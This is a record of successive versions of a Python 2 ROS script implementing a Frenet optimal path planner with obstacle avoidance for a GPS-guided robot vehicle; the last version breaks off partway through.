"step-3": "<mask token>\n\n\nclass FrenetPath:\n\n def __init__(self):\n self.t = []\n self.d = []\n self.d_d = []\n self.d_dd = []\n self.d_ddd = []\n self.s = []\n self.s_d = []\n self.s_dd = []\n self.s_ddd = []\n self.cd = 0.0\n self.cv = 0.0\n self.cf = 0.0\n self.x = []\n self.y = []\n self.yaw = []\n self.ds = []\n self.c = []\n\n\ndef calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):\n frenet_paths = []\n for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):\n for Ti in np.arange(MINT, MAXT, DT):\n fp = FrenetPath()\n lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)\n fp.t = [t for t in np.arange(0.0, Ti, DT)]\n fp.d = [lat_qp.calc_point(t) for t in fp.t]\n fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]\n fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]\n fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]\n for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, \n TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):\n tfp = copy.deepcopy(fp)\n lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)\n tfp.s = [lon_qp.calc_point(t) for t in fp.t]\n tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]\n tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]\n tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]\n Jp = sum(np.power(tfp.d_ddd, 2))\n Js = sum(np.power(tfp.s_ddd, 2))\n ds = (TARGET_SPEED - tfp.s_d[-1]) ** 2\n tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1] ** 2\n tfp.cv = KJ * Js + KT * Ti + KD * ds\n tfp.cf = KLAT * tfp.cd + KLON * tfp.cv\n frenet_paths.append(tfp)\n return frenet_paths\n\n\ndef calc_global_paths(fplist, csp):\n for fp in fplist:\n for i in range(len(fp.s)):\n ix, iy = csp.calc_position(fp.s[i])\n if ix is None:\n break\n iyaw = csp.calc_yaw(fp.s[i])\n di = fp.d[i]\n fx = ix + di * math.cos(iyaw + math.pi / 2.0)\n fy = iy + di * math.sin(iyaw + math.pi / 2.0)\n fp.x.append(fx)\n fp.y.append(fy)\n for i in range(len(fp.x) - 1):\n dx = fp.x[i + 1] - fp.x[i]\n dy = fp.y[i + 1] - fp.y[i]\n fp.yaw.append(math.atan2(dy, dx))\n fp.ds.append(math.sqrt(dx ** 2 + dy ** 2))\n fp.yaw.append(fp.yaw[-1])\n fp.ds.append(fp.ds[-1])\n for i in range(len(fp.yaw) - 1):\n fp.c.append((fp.yaw[i + 1] - fp.yaw[i]) / fp.ds[i])\n return fplist\n\n\ndef check_collision(fp, ob):\n for i in range(len(ob[:, 0])):\n d = [((ix - ob[i, 0]) ** 2 + (iy - ob[i, 1]) ** 2) for ix, iy in\n zip(fp.x, fp.y)]\n collision = any([(di <= ROBOT_RADIUS ** 2) for di in d])\n if collision:\n return False\n return True\n\n\ndef check_paths(fplist, ob):\n \"\"\"\n check path above max speed, max a, does collision or not\n \"\"\"\n okind = []\n for i in range(len(fplist)):\n if any([(v > MAX_SPEED) for v in fplist[i].s_d]):\n continue\n elif any([(abs(a) > MAX_ACCEL) for a in fplist[i].s_dd]):\n continue\n elif any([(abs(c) > MAX_CURVATURE) for c in fplist[i].c]):\n continue\n elif not check_collision(fplist[i], ob):\n continue\n okind.append(i)\n return [fplist[i] for i in okind]\n\n\ndef frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob):\n ob = np.array(ob)\n fplist = calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0)\n fplist = calc_global_paths(fplist, csp)\n fplist = check_paths(fplist, ob)\n mincost = float('inf')\n bestpath = None\n for fp in fplist:\n if mincost >= fp.cf:\n mincost = fp.cf\n bestpath = fp\n return bestpath\n\n\ndef generate_road_widle(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []\n for i_s in s:\n ix, iy = 
csp.calc_position(i_s)\n road_left_ix = ix + MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_left_iy = iy + MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_right_ix = ix - MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_right_iy = iy - MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_left_x.append(road_left_ix)\n road_left_y.append(road_left_iy)\n road_right_x.append(road_right_ix)\n road_right_y.append(road_right_iy)\n return road_left_x, road_left_y, road_right_x, road_right_y\n\n\ndef generate_target_course(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(csp.calc_yaw(i_s))\n rk.append(csp.calc_curvature(i_s))\n return rx, ry, ryaw, rk, csp\n\n\ndef load_global_path():\n global zero_cord_x, zero_cord_y\n bet = 0.1\n blank = []\n white = []\n yellow = []\n GPS_x = []\n GPS_y = []\n nums, ber = np.loadtxt(\n '/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt'\n , dtype=str, delimiter=',', unpack=True)\n for i in range(len(nums)):\n if not nums[i] in blank:\n yellow.append(float(nums[i]))\n white.append(float(ber[i]))\n bx = yellow[0]\n by = white[0]\n for i in range(len(yellow)):\n dx = yellow[i] - bx\n dy = white[i] - by\n dis = math.sqrt(dx ** 2 + dy ** 2)\n if dis > bet:\n GPS_x.append(yellow[i])\n GPS_y.append(white[i])\n bx = yellow[i]\n by = white[i]\n GPS_x = np.array(GPS_x)\n GPS_y = np.array(GPS_y)\n zero_cord_x = GPS_x[0]\n zero_cord_y = GPS_y[0]\n GPS_x = GPS_x - zero_cord_x\n GPS_y = GPS_y - zero_cord_y\n plt.plot(GPS_x, GPS_y, '-r', label='GPS point ')\n plt.plot()\n plt.show()\n return GPS_x, GPS_y\n\n\nclass Info(object):\n\n def __init__(self):\n self.CurrGPS_lat = float(-1)\n self.CurrGPS_lon = float(-1)\n self.CurrentVelocity = float(-1)\n self.Target_Velocity = float(-1)\n self.ImuYaw = float(-1)\n self.Target_Theta = float(-1)\n self.gob = np.array([])\n self.ob = np.array([])\n self.gobx = np.array([])\n self.goby = np.array([])\n rospy.Subscriber('coordinate', Point, self.FeedbackCallbackObs)\n sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.\n FeedbackCallbackGPSIMU, queue_size=10)\n rospy.Subscriber('Motor_Feedback_mssage', Motor_Feedback, self.\n RVcallback, queue_size=10)\n\n def FeedbackCallbackGPSIMU(self, msg):\n self.CurrGPS_lat = msg.latitude\n self.CurrGPS_lon = msg.longitude\n self.ImuYaw = (90 - msg.course_angle) * np.pi / 180\n\n def FeedbackCallbackObs(self, msg):\n global Gob_x\n global Gob_y\n self.gobx = msg.x\n self.goby = msg.y\n Gob_x.append(self.gobx)\n Gob_y.append(self.goby)\n self.gob = np.column_stack((Gob_x, Gob_y))\n\n def RVcallback(self, msg):\n self.CurrentVelocity = msg.Base_Vehspd\n\n def init(self):\n return (self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx,\n self.goby, self.gob, self.CurrentVelocity)\n\n def talker(self, Target_Velocity, path_record):\n self.rate = rospy.Rate(100)\n self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32,\n queue_size=10)\n self.path_pub = rospy.Publisher('trajectory', localPath, queue_size=50)\n self.pub_Velocity.publish(Target_Velocity)\n self.path_pub.publish(path_record)\n\n\ndef get_transalation(curr_gps_lat, curr_gps_lon):\n curr_posy = float(curr_gps_lon) - zero_cord_y\n curr_posx = float(curr_gps_lat) - zero_cord_x\n return curr_posx, curr_posy\n\n\ndef get_transformation(pt, curr_yaw, 
T):\n c, s = np.cos(curr_yaw), np.sin(curr_yaw)\n R = np.array(((c, -s), (s, c)))\n pt = pt.dot(R) + T\n return pt\n\n\ndef get_arc_length(tx, ty, st):\n arc_length = 0\n for x in range(1, st):\n arc_length = arc_length + np.hypot(tx[x - 1] - tx[x], ty[x - 1] - ty[x]\n )\n return arc_length\n\n\ndef get_lateral_dist(tx, ty, curr_posx, curr_posy):\n dist = []\n for x in range(0, len(tx) - 1):\n dist.append(np.hypot(float(curr_posx) - tx[x], float(curr_posy) -\n ty[x]))\n lat_dist = min(dist)\n st = dist.index(min(dist))\n theta1 = math.atan2(ty[st] - ty[st - 1], tx[st] - tx[st - 1])\n theta2 = math.atan2(curr_posy - ty[st - 1], curr_posx - tx[st - 1])\n if lat_dist < THRESH_DIST:\n lat_dist = 0\n curr_posx = tx[st]\n curr_posy = ty[st]\n if theta2 < theta1:\n lat_dist = -lat_dist\n return st, lat_dist, curr_posx, curr_posy\n\n\ndef proportional_control(target, current):\n a = 1.0 * (target - current)\n return a\n\n\ndef main():\n ptx = []\n pty = []\n ptx, pty = load_global_path()\n tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)\n road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(\n ptx, pty)\n c_speed = 5.0 / 3.6\n c_acc = 1.0\n c_d_dd = 0\n c_d_d = 0\n area = 25.0\n start = time.time()\n rospy.init_node('AvoidObstacles_PlannerOut', anonymous=False)\n my_node = Info()\n while not rospy.is_shutdown():\n (CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity\n ) = my_node.init()\n ob = []\n if CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n T = [curr_posx, curr_posy]\n curr_yaw = ImuYaw\n if len(gob) == 0:\n ob = [[-20, -20]]\n else:\n ob = gob\n ob_len = len(ob) - 1\n for x in xrange(0, ob_len):\n ob = np.array(ob)\n ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)\n try:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat,\n CurrGPS_lon)\n spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty,\n curr_posx, curr_posy)\n s0 = get_arc_length(tx, ty, spt)\n path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d,\n c_d_dd, ob)\n c_speed = path.s_d[1]\n c_d_d = path.d_d[1]\n c_d_dd = path.d_dd[1]\n if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:\n print('Goal')\n c_speed = 0.0\n break\n if show_animation:\n plt.cla()\n plt.plot(tx, ty, '-.k')\n plt.plot(road_left_x, road_left_y, '-k')\n plt.plot(road_right_x, road_right_y, '-k')\n plt.plot(ob[:, 0], ob[:, 1], 'ob')\n plt.plot(path.x[1:], path.y[1:], '-or')\n plt.plot(path.x[1], path.y[1], 'vc')\n plt.xlim(path.x[1] - area, path.x[1] + area)\n plt.ylim(path.y[1] - area, path.y[1] + area)\n plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw),\n math.sin(curr_yaw), fc='r', ec='k', head_width=0.5,\n head_length=1.0)\n plt.title('v[km/h]:' + str(c_speed)[0:4])\n plt.xlabel(u'x/m', fontsize=14)\n plt.ylabel(u'y/m', fontsize=14)\n plt.pause(0.0001)\n PathFail_flag = 0\n except:\n PathFail_flag = 1\n print(\"Don't find optimal path\")\n global Gob_x\n global Gob_y\n Gob_x *= 0\n Gob_y *= 0\n try:\n \"\"\"\n acc = proportional_control(6, CurrentVelocity)\n temp1=path.yaw[1] `\n temp2=curr_yaw \n \n if temp1<0:\n temp1=6.28+temp1\n if temp2<0:\n temp2=6.28+temp2\n\n val = temp1-temp2\n \n if val > 3.14:\n val = val - 6.28\n if val < -3.14:\n val = val + 6.28\n \n val = math.degrees(val)\n \n if val > 50:\n val = 50\n if val < -50:\n val = -50\n \n my_node.talker(acc,val)\n \"\"\"\n path_record = localPath()\n for i in range(len(path.x[1:])):\n path_record.path_x.append(path.x[i])\n 
path_record.path_y.append(path.y[i])\n if len(path_record.path_x) > 10000:\n path_record.path_x.pop(0)\n path_record.path_y.pop(0)\n my_node.talker(c_speed, path_record)\n except:\n print('local path send fail')\n pass\n print('Finish')\n end = time.time()\n if show_animation:\n plt.grid(True)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nMAX_SPEED = 30.0\nMAX_ACCEL = 50.0\nMAX_CURVATURE = 30.0\nMAX_ROAD_WIDTH = 10.0\nD_ROAD_W = 2.0\nDT = 0.3\nMAXT = 6.0\nMINT = 4.0\nTARGET_SPEED = 15.0 / 3.6\nD_T_S = 10.0 / 3.6\nN_S_SAMPLE = 0.1\nROBOT_RADIUS = 2.3\nTHRESH_DIST = 0.01\nKJ = 0.8\nKT = 0.1\nKD = 20.0\nKLAT = 0.8\nKLON = 0.2\nshow_animation = True\nGob_x = []\nGob_y = []\nPathFail_flag = 0\n\n\nclass FrenetPath:\n\n def __init__(self):\n self.t = []\n self.d = []\n self.d_d = []\n self.d_dd = []\n self.d_ddd = []\n self.s = []\n self.s_d = []\n self.s_dd = []\n self.s_ddd = []\n self.cd = 0.0\n self.cv = 0.0\n self.cf = 0.0\n self.x = []\n self.y = []\n self.yaw = []\n self.ds = []\n self.c = []\n\n\ndef calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):\n frenet_paths = []\n for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):\n for Ti in np.arange(MINT, MAXT, DT):\n fp = FrenetPath()\n lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)\n fp.t = [t for t in np.arange(0.0, Ti, DT)]\n fp.d = [lat_qp.calc_point(t) for t in fp.t]\n fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]\n fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]\n fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]\n for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, \n TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):\n tfp = copy.deepcopy(fp)\n lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)\n tfp.s = [lon_qp.calc_point(t) for t in fp.t]\n tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]\n tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]\n tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]\n Jp = sum(np.power(tfp.d_ddd, 2))\n Js = sum(np.power(tfp.s_ddd, 2))\n ds = (TARGET_SPEED - tfp.s_d[-1]) ** 2\n tfp.cd = KJ * Jp + KT * Ti + KD * tfp.d[-1] ** 2\n tfp.cv = KJ * Js + KT * Ti + KD * ds\n tfp.cf = KLAT * tfp.cd + KLON * tfp.cv\n frenet_paths.append(tfp)\n return frenet_paths\n\n\ndef calc_global_paths(fplist, csp):\n for fp in fplist:\n for i in range(len(fp.s)):\n ix, iy = csp.calc_position(fp.s[i])\n if ix is None:\n break\n iyaw = csp.calc_yaw(fp.s[i])\n di = fp.d[i]\n fx = ix + di * math.cos(iyaw + math.pi / 2.0)\n fy = iy + di * math.sin(iyaw + math.pi / 2.0)\n fp.x.append(fx)\n fp.y.append(fy)\n for i in range(len(fp.x) - 1):\n dx = fp.x[i + 1] - fp.x[i]\n dy = fp.y[i + 1] - fp.y[i]\n fp.yaw.append(math.atan2(dy, dx))\n fp.ds.append(math.sqrt(dx ** 2 + dy ** 2))\n fp.yaw.append(fp.yaw[-1])\n fp.ds.append(fp.ds[-1])\n for i in range(len(fp.yaw) - 1):\n fp.c.append((fp.yaw[i + 1] - fp.yaw[i]) / fp.ds[i])\n return fplist\n\n\ndef check_collision(fp, ob):\n for i in range(len(ob[:, 0])):\n d = [((ix - ob[i, 0]) ** 2 + (iy - ob[i, 1]) ** 2) for ix, iy in\n zip(fp.x, fp.y)]\n collision = any([(di <= ROBOT_RADIUS ** 2) for di in d])\n if collision:\n return False\n return True\n\n\ndef check_paths(fplist, ob):\n \"\"\"\n check path above max speed, max a, does collision or not\n \"\"\"\n okind = []\n for i in range(len(fplist)):\n if any([(v > MAX_SPEED) for v in fplist[i].s_d]):\n continue\n elif any([(abs(a) > MAX_ACCEL) for a in fplist[i].s_dd]):\n continue\n elif any([(abs(c) > MAX_CURVATURE) for c in fplist[i].c]):\n continue\n elif not check_collision(fplist[i], ob):\n continue\n okind.append(i)\n return [fplist[i] for i in okind]\n\n\ndef frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob):\n ob = np.array(ob)\n fplist = calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0)\n fplist = calc_global_paths(fplist, csp)\n fplist = 
check_paths(fplist, ob)\n mincost = float('inf')\n bestpath = None\n for fp in fplist:\n if mincost >= fp.cf:\n mincost = fp.cf\n bestpath = fp\n return bestpath\n\n\ndef generate_road_widle(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n road_left_ix = ix + MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_left_iy = iy + MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s) +\n math.pi / 2.0)\n road_right_ix = ix - MAX_ROAD_WIDTH / 2 * math.cos(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_right_iy = iy - MAX_ROAD_WIDTH / 2 * math.sin(csp.calc_yaw(i_s\n ) + math.pi / 2.0)\n road_left_x.append(road_left_ix)\n road_left_y.append(road_left_iy)\n road_right_x.append(road_right_ix)\n road_right_y.append(road_right_iy)\n return road_left_x, road_left_y, road_right_x, road_right_y\n\n\ndef generate_target_course(x, y):\n csp = Spline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(csp.calc_yaw(i_s))\n rk.append(csp.calc_curvature(i_s))\n return rx, ry, ryaw, rk, csp\n\n\ndef load_global_path():\n global zero_cord_x, zero_cord_y\n bet = 0.1\n blank = []\n white = []\n yellow = []\n GPS_x = []\n GPS_y = []\n nums, ber = np.loadtxt(\n '/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt'\n , dtype=str, delimiter=',', unpack=True)\n for i in range(len(nums)):\n if not nums[i] in blank:\n yellow.append(float(nums[i]))\n white.append(float(ber[i]))\n bx = yellow[0]\n by = white[0]\n for i in range(len(yellow)):\n dx = yellow[i] - bx\n dy = white[i] - by\n dis = math.sqrt(dx ** 2 + dy ** 2)\n if dis > bet:\n GPS_x.append(yellow[i])\n GPS_y.append(white[i])\n bx = yellow[i]\n by = white[i]\n GPS_x = np.array(GPS_x)\n GPS_y = np.array(GPS_y)\n zero_cord_x = GPS_x[0]\n zero_cord_y = GPS_y[0]\n GPS_x = GPS_x - zero_cord_x\n GPS_y = GPS_y - zero_cord_y\n plt.plot(GPS_x, GPS_y, '-r', label='GPS point ')\n plt.plot()\n plt.show()\n return GPS_x, GPS_y\n\n\nclass Info(object):\n\n def __init__(self):\n self.CurrGPS_lat = float(-1)\n self.CurrGPS_lon = float(-1)\n self.CurrentVelocity = float(-1)\n self.Target_Velocity = float(-1)\n self.ImuYaw = float(-1)\n self.Target_Theta = float(-1)\n self.gob = np.array([])\n self.ob = np.array([])\n self.gobx = np.array([])\n self.goby = np.array([])\n rospy.Subscriber('coordinate', Point, self.FeedbackCallbackObs)\n sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.\n FeedbackCallbackGPSIMU, queue_size=10)\n rospy.Subscriber('Motor_Feedback_mssage', Motor_Feedback, self.\n RVcallback, queue_size=10)\n\n def FeedbackCallbackGPSIMU(self, msg):\n self.CurrGPS_lat = msg.latitude\n self.CurrGPS_lon = msg.longitude\n self.ImuYaw = (90 - msg.course_angle) * np.pi / 180\n\n def FeedbackCallbackObs(self, msg):\n global Gob_x\n global Gob_y\n self.gobx = msg.x\n self.goby = msg.y\n Gob_x.append(self.gobx)\n Gob_y.append(self.goby)\n self.gob = np.column_stack((Gob_x, Gob_y))\n\n def RVcallback(self, msg):\n self.CurrentVelocity = msg.Base_Vehspd\n\n def init(self):\n return (self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx,\n self.goby, self.gob, self.CurrentVelocity)\n\n def talker(self, Target_Velocity, path_record):\n self.rate = rospy.Rate(100)\n self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32,\n queue_size=10)\n self.path_pub = 
rospy.Publisher('trajectory', localPath, queue_size=50)\n self.pub_Velocity.publish(Target_Velocity)\n self.path_pub.publish(path_record)\n\n\ndef get_transalation(curr_gps_lat, curr_gps_lon):\n curr_posy = float(curr_gps_lon) - zero_cord_y\n curr_posx = float(curr_gps_lat) - zero_cord_x\n return curr_posx, curr_posy\n\n\ndef get_transformation(pt, curr_yaw, T):\n c, s = np.cos(curr_yaw), np.sin(curr_yaw)\n R = np.array(((c, -s), (s, c)))\n pt = pt.dot(R) + T\n return pt\n\n\ndef get_arc_length(tx, ty, st):\n arc_length = 0\n for x in range(1, st):\n arc_length = arc_length + np.hypot(tx[x - 1] - tx[x], ty[x - 1] - ty[x]\n )\n return arc_length\n\n\ndef get_lateral_dist(tx, ty, curr_posx, curr_posy):\n dist = []\n for x in range(0, len(tx) - 1):\n dist.append(np.hypot(float(curr_posx) - tx[x], float(curr_posy) -\n ty[x]))\n lat_dist = min(dist)\n st = dist.index(min(dist))\n theta1 = math.atan2(ty[st] - ty[st - 1], tx[st] - tx[st - 1])\n theta2 = math.atan2(curr_posy - ty[st - 1], curr_posx - tx[st - 1])\n if lat_dist < THRESH_DIST:\n lat_dist = 0\n curr_posx = tx[st]\n curr_posy = ty[st]\n if theta2 < theta1:\n lat_dist = -lat_dist\n return st, lat_dist, curr_posx, curr_posy\n\n\ndef proportional_control(target, current):\n a = 1.0 * (target - current)\n return a\n\n\ndef main():\n ptx = []\n pty = []\n ptx, pty = load_global_path()\n tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)\n road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(\n ptx, pty)\n c_speed = 5.0 / 3.6\n c_acc = 1.0\n c_d_dd = 0\n c_d_d = 0\n area = 25.0\n start = time.time()\n rospy.init_node('AvoidObstacles_PlannerOut', anonymous=False)\n my_node = Info()\n while not rospy.is_shutdown():\n (CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity\n ) = my_node.init()\n ob = []\n if CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)\n T = [curr_posx, curr_posy]\n curr_yaw = ImuYaw\n if len(gob) == 0:\n ob = [[-20, -20]]\n else:\n ob = gob\n ob_len = len(ob) - 1\n for x in xrange(0, ob_len):\n ob = np.array(ob)\n ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)\n try:\n curr_posx, curr_posy = get_transalation(CurrGPS_lat,\n CurrGPS_lon)\n spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty,\n curr_posx, curr_posy)\n s0 = get_arc_length(tx, ty, spt)\n path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d,\n c_d_dd, ob)\n c_speed = path.s_d[1]\n c_d_d = path.d_d[1]\n c_d_dd = path.d_dd[1]\n if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:\n print('Goal')\n c_speed = 0.0\n break\n if show_animation:\n plt.cla()\n plt.plot(tx, ty, '-.k')\n plt.plot(road_left_x, road_left_y, '-k')\n plt.plot(road_right_x, road_right_y, '-k')\n plt.plot(ob[:, 0], ob[:, 1], 'ob')\n plt.plot(path.x[1:], path.y[1:], '-or')\n plt.plot(path.x[1], path.y[1], 'vc')\n plt.xlim(path.x[1] - area, path.x[1] + area)\n plt.ylim(path.y[1] - area, path.y[1] + area)\n plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw),\n math.sin(curr_yaw), fc='r', ec='k', head_width=0.5,\n head_length=1.0)\n plt.title('v[km/h]:' + str(c_speed)[0:4])\n plt.xlabel(u'x/m', fontsize=14)\n plt.ylabel(u'y/m', fontsize=14)\n plt.pause(0.0001)\n PathFail_flag = 0\n except:\n PathFail_flag = 1\n print(\"Don't find optimal path\")\n global Gob_x\n global Gob_y\n Gob_x *= 0\n Gob_y *= 0\n try:\n \"\"\"\n acc = proportional_control(6, CurrentVelocity)\n temp1=path.yaw[1] `\n temp2=curr_yaw \n \n if temp1<0:\n temp1=6.28+temp1\n if temp2<0:\n 
temp2=6.28+temp2\n\n val = temp1-temp2\n \n if val > 3.14:\n val = val - 6.28\n if val < -3.14:\n val = val + 6.28\n \n val = math.degrees(val)\n \n if val > 50:\n val = 50\n if val < -50:\n val = -50\n \n my_node.talker(acc,val)\n \"\"\"\n path_record = localPath()\n for i in range(len(path.x[1:])):\n path_record.path_x.append(path.x[i])\n path_record.path_y.append(path.y[i])\n if len(path_record.path_x) > 10000:\n path_record.path_x.pop(0)\n path_record.path_y.pop(0)\n my_node.talker(c_speed, path_record)\n except:\n print('local path send fail')\n pass\n print('Finish')\n end = time.time()\n if show_animation:\n plt.grid(True)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/python2\n# -*- coding: UTF-8 -*-\n# coding: utf-8\n#!/usr/bin/env python\n\n\n'''\n发布轨迹信息 \npath.x; path.y; c_speed;\n\n'''\n\n\n\n\n\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport copy\nimport math\nfrom cubic_spline import Spline2D\nfrom polynomials import QuarticPolynomial, QuinticPolynomial\nimport time\nimport rospy\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import Point\nfrom nav_msgs.msg import Path\nfrom local_planner.msg import localPath\nfrom geometry_msgs.msg import PoseStamped, Quaternion\nimport tf\nfrom CAN_driver.msg import Motor_Feedback\nfrom GNSS_driver.msg import GNSS_CAN\nimport sys\n\n\n\n# 参数\nMAX_SPEED = 30.0 # 最大速度 [m/s]\nMAX_ACCEL = 50.0 # 最大加速度 [m/ss]\nMAX_CURVATURE = 30.0 # 最大曲率 [1/m]\nMAX_ROAD_WIDTH = 10.0 # 最大道路宽度 [m]\nD_ROAD_W = 2.0 # 路宽采样间隔 [m]\nDT = 0.3 # Delta T[s]\nMAXT = 6.0 # 最大预测时间 [m]\nMINT = 4.0 # 最小预测时间 [m]\nTARGET_SPEED = 15.0/3.6 # 目标速度 [m/s] 即纵向速度保持\nD_T_S = 10.0/3.6 # 目标opo][]o][o][\\o][o][o速度采样间隔 [m/s]\nN_S_SAMPLE = 0.1 # 目标速度采样数量\nROBOT_RADIUS = 2.3 # 车辆半径 [m]\nTHRESH_DIST=0.01\n\n# 损失函数权重\nKJ = 0.8\nKT = 0.1\nKD = 20.0\nKLAT = 0.8\nKLON = 0.2\nshow_animation = True\n\n\nGob_x = []\nGob_y = []\n\n\n#规划失败标志 1 决策层需要\nPathFail_flag = 0 \n\n\nclass FrenetPath:\n\n def __init__(self):\n self.t = []\n self.d = []\n self.d_d = []\n self.d_dd = []\n self.d_ddd = []\n self.s = []\n self.s_d = []\n self.s_dd = []\n self.s_ddd = []\n self.cd = 0.0\n self.cv = 0.0\n self.cf = 0.0\n\n self.x = []\n self.y = []\n self.yaw = []\n self.ds = []\n self.c = []\n\n\ndef calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0):\n\n frenet_paths = []\n\n # generate path to each offset goal\n for di in np.arange(-MAX_ROAD_WIDTH, MAX_ROAD_WIDTH, D_ROAD_W):\n # 采样,并对每一个目标配置生成轨迹\n # Lateral motion planning\n for Ti in np.arange(MINT, MAXT, DT):\n fp = FrenetPath()\n # 计算出关于目标配置di,Ti的横向多项式\n lat_qp = QuinticPolynomial(c_d, c_d_d, c_d_dd, di, 0.0, 0.0, Ti)\n\n fp.t = [t for t in np.arange(0.0, Ti, DT)]\n fp.d = [lat_qp.calc_point(t) for t in fp.t]\n fp.d_d = [lat_qp.calc_first_derivative(t) for t in fp.t]\n fp.d_dd = [lat_qp.calc_second_derivative(t) for t in fp.t]\n fp.d_ddd = [lat_qp.calc_third_derivative(t) for t in fp.t]\n\n # 纵向速度规划 (速度保持)\n # Loongitudinal motion planning (Velocity keeping)\n for tv in np.arange(TARGET_SPEED - D_T_S * N_S_SAMPLE, TARGET_SPEED + D_T_S * N_S_SAMPLE, D_T_S):\n tfp = copy.deepcopy(fp)\n lon_qp = QuarticPolynomial(s0, c_speed, 0.0, tv, 0.0, Ti)\n\n tfp.s = [lon_qp.calc_point(t) for t in fp.t]\n tfp.s_d = [lon_qp.calc_first_derivative(t) for t in fp.t]\n tfp.s_dd = [lon_qp.calc_second_derivative(t) for t in fp.t]\n tfp.s_ddd = [lon_qp.calc_third_derivative(t) for t in fp.t]\n\n\n ###########################################################\n #高速时的损失函数\n 